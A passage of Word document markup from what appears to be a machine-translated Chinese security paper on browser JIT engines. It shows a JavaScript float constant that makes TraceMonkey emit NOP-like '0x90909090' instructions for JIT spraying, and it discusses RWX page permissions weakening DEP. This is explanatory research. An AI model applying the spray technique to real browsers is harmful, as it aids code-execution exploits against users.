        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="610F02D5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:ind w:left="544"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> = -6.828527034422786e-229;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC85BD" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D36DC3" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JIT生成并执行以下本地代码</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3526C455" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5" w:after="1"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="501" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="01E0" w:firstRow="1" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="624"/>
        <w:gridCol w:w="2402"/>
      </w:tblGrid>
      <w:tr w:rsidR="0026102A" w14:paraId="356E4227" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B46B956" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="181" w:lineRule="exact"/>
              <w:ind w:left="31" w:right="74"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x429eda：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5340E485" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="181" w:lineRule="exact"/>
              <w:ind w:left="96"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8B98B5" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="29"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x90909090,0x5c0（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="0D18E058" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61ECA94F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="31" w:right="74"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x429ee4：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F281F0E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="96"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="513C3061" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="123" w:right="29"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x90909090,0x5c4（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="303A9657" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="200"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E63410D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="31" w:right="74"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x429eee：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10C3423A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="96"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DD06EE2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="123" w:right="29"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x90909090,0x5c8（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="42EF4638" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52A650F6" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="31" w:right="74"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x429ef8：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="517CC089" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="96"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39F33970" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="181" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="29"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x90909090,0x5cc（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="73357E6A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="210"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7065A596" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="31" w:right="74"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x429f02：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="068E6421" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="96"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FA40A8D" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="19"/>
              <w:ind w:left="123" w:right="29"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x90909090,0x5d0（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0026102A" w14:paraId="42994CBB" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="190"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="663F9560" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="161" w:lineRule="exact"/>
              <w:ind w:left="31" w:right="74"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>0x429f0c：</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="624" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3052813B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="161" w:lineRule="exact"/>
              <w:ind w:left="96"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>movl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683489DA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9" w:line="161" w:lineRule="exact"/>
              <w:ind w:left="123" w:right="29"/>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>$ 0x90909090,0x5d4（％</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>esi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E21884A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="161" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1500" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37763701" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2272"/>
        </w:tabs>
        <w:spacing w:before="86" w:line="264" w:lineRule="auto"/>
        <w:ind w:left="544" w:right="5457"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>0x429f16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>movl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>$ 0x90909090,0x5d8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>（％</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0x429f20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>l $ 0x90909090,0x5dc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>（％</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>esi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D28FD13" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3881A855" w14:textId="51CFA71D" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>我们的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>浮点值现在</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以轻松地用于对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>引擎执行JIT</w:t>
      </w:r>
      <w:r w:rsidR="00A5797A">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> spray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612383F8" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A8A98B0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_bookmark10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>页面权限</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22105861" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="39"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681B3CCE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="280" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JaegerMonkey，TraceMonkey和LLVM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> JIT都必须为其生成的本机代码分配和管理内存。为此，使用了低级分配器。首选的API是POSIX平台上的mmap（2）和Windows上的VirtualAlloc。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通常会要求这些低级内存分配器提供标有“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>读取”，</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“写入”和“执行”权限的内存。尽管可以随意选择这些页面权限以使其尽可能开放，但是它们对于支持JIT引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>擎的主要行为是必</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>需的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F8942F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1659B7C0" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在我们的研究过程中，几乎所有接受调查的JIT引擎都为页面分配了RWX权限（保存为IE9）。</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此弱权限</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>掩码直接与保护功能（例如DEP）获得的安全性相矛盾。一些JIT设计依赖于这些保护，因为更高粒度的访问控制有时会导致性能大幅下降。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB1127" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="29"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76FDB4D2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="462"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JaegerMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
